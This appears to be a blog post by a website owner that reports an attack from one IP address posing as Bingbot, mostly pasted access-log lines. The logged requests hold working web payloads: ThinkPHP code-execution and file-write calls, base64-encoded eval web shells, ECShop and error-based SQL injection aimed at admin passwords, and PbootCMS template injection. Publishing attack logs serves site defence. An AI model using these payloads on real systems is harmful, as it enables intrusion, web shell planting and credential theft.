
124.156.120.3 – Another Hacking Attempt

Found another hacking attempt this morning when examining the access.log. I’ve pasted the requests from 124.156.120.3 below. It appears to attempt to inject some PHP and SQL code. In addition, 124.156.120.3 also identifies itself as Bingbot, which obviously is not true.

124.156.120.3 seems to be assigned to Singapore Tencent Cloud Computing (Beijing) Co. Ltd. It’s likely one of their customers that has been hacked. Here’s the location on a Google map:

124.156.120.3 - - [17/Sep/2019:14:08:53 -0700] "PUT //QqYN1A763TmozH0L.txt HTTP/1.1" 404 4221 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:54 -0700] "GET //type.php?template=tag_(){};@unlink(FILE);print_r(blshell);assert($_POST[KxVHuP17U239lQyI]);{//../rss HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:54 -0700] "GET //data/cache_template/rss.tpl.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:55 -0700] "GET //index.php?s=index/\think\template\driver\file/write&cacheFile=53USa9rmzg916cmW.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%
27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E
%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:55 -0700] "GET //53USa9rmzg916cmW.php HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:56 -0700] "GET //?s=index/\think\template\driver\file/write&cacheFile=53USa9rmzg916cmW.php&content=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%
3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65
%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 7350 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:57 -0700] "GET //53USa9rmzg916cmW.php HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:57 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=53USa9rmzg916cmW.php&vars[1][]=%3C%3F%70%68%70%0D%0A%0D%0A%0D%0A%24%5F%63%6F%6E%66%69%67%20%3D%20%61%72%72%61%79%28%29%3B%0D%0A%0D%0A%2F%2F%20%20%20%43%4F%4E%46%49%47%20%41%41%41%0A%0D%45%56%41%4C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%20%20%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%61%61%61%0A%0D%65%76%61%6C%28%43%48%52%28%31%30%31%29%2E%43%48%52%28%31%31%38%29%2E%43%48%52%28%39%37%29%2E%43%48%52%28%31%30%38%29%2E%43%48%52%28%34%30%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%33%36%29%2E%43%48%52%28%39%35%29%2E%43%48%52%28%38%30%29%2E%43%48%52%28%37%39%29%2E%43%48%52%28%38%33%29%2E%43%48%52%28%38%34%29%2E%43%48%52%28%39%31%29%2E%43%48%52%28%39%39%29%2E%43%48%52%28%39%33%29%2E%43%48%52%28%35%39%29%2E%43%48%52%28%33%34%29%2E%43%48%52%28%34%31%29%2E%43%48%52%28%35%39%29%29%3B%2F%2F%27%5D%20%3D%20%27%61%61%61%61%27%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%53%4F%55%52%43%45%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75
%72%63%65%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%63%64%62%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%73%6F%75%72%63%65%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%54%41%52%47%45%54%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%6C%6F%63%61%6C%68%6F%73%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%72%6F%6F%74%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%64%69%73%63%75%7A%78%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%70%72%65%5F%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%74%61%72%67%65%74%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%43%4F%4E%46%49%47%20%55%43%45%4E%54%45%52%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%68%6F%73%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%75%73%65%72%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%70%77%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%7
5%63%65%6E%74%65%72%27%5D%5B%27%64%62%6E%61%6D%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%74%61%62%6C%65%70%72%65%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%64%62%63%68%61%72%73%65%74%27%5D%20%3D%20%27%27%3B%0D%0A%24%5F%63%6F%6E%66%69%67%5B%27%75%63%65%6E%74%65%72%27%5D%5B%27%70%63%6F%6E%6E%65%63%74%27%5D%20%3D%20%31%3B%0D%0A%0D%0A%0D%0A%2F%2F%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%20%54%48%45%20%45%4E%44%20%20%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%2D%20%2F%2F%0D%0A%0D%0A%3F%3E%3C%3F%70%68%70%20%65%63%68%6F%20%27%65%63%68%6F%27%2E%27%54%68%69%6E%6B%50%48%50%27%3F%3E HTTP/1.1" 200 8202 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:58 -0700] "GET //53USa9rmzg916cmW.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:08:59 -0700] "GET //?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=@eval($_GET[%27f*ck%27]);&f*ck=fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbYmxibF0pPz5ibHNoZWxs)); HTTP/1.1" 200 8204 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:00 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:00 -0700] "POST //index.php?s=index HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:01 -0700] "GET //d.php HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:01 -0700] "GET //user.php?act=login HTTP/1.1" 404 415 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:01 -0700] "GET //user.php?act=login HTTP/1.1" 404 415 "554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:\"num\";s:280:\"/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:\"'/\";}" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:02 -0700] "GET //i.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:02 -0700] "GET //user.php?act=login HTTP/1.1" 404 413 "45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:\"num\";s:289:\"/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a326b75634768774a79776e4a45496a5444772f63476877494756325957776f4a46395154314e55573139644b54732f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:11:\"-1' UNION/\";}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:03 -0700] "GET //i.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:04 -0700] "GET //index.php?c=api&m=data2&auth=50ce0d2401ce4802751739552c8e4467&param=update_avatar&file=data:image/php;base64,PD9waHAgQGV2YWwoJF9QT1NUW3NoZWxsXSk7Pz5ibHNoZWxs HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:04 -0700] "GET //uploadfile/member/0/0x0.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:05 -0700] "POST //index.php?m=member&c=index&a=register&siteid=1 HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:05 -0700] "GET //index.php/list/5/?current={pboot:if(eval\\($_GET['a']))}1{/pboot:if}&a=fputs(fopen(base64_decode('eC5waHA'),'w'),%20base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydibCddKTsgPz5ibHNoZWxs')) HTTP/1.1" 404 415 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:06 -0700] "GET //x.php HTTP/1.1" 404 413 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:07 -0700] "HEAD //index.php?_m=mod_email&_a=do_mail HTTP/1.1" 404 396 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

124.156.120.3 - - [17/Sep/2019:14:09:07 -0700] "HEAD //news/html/?410'union//select//1//from//(select//count(),concat(floor(rand(0)2),0x3a,(select//concat(0x23,0x23,0x23,user,0x3a,password,0x23,0x23,0x23)//from//pwn_base_admin//limit//0,1),0x3a)a//from//information_schema.tables//group//by//a)b//where'1'='1.html HTTP/1.1" 404 394 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"

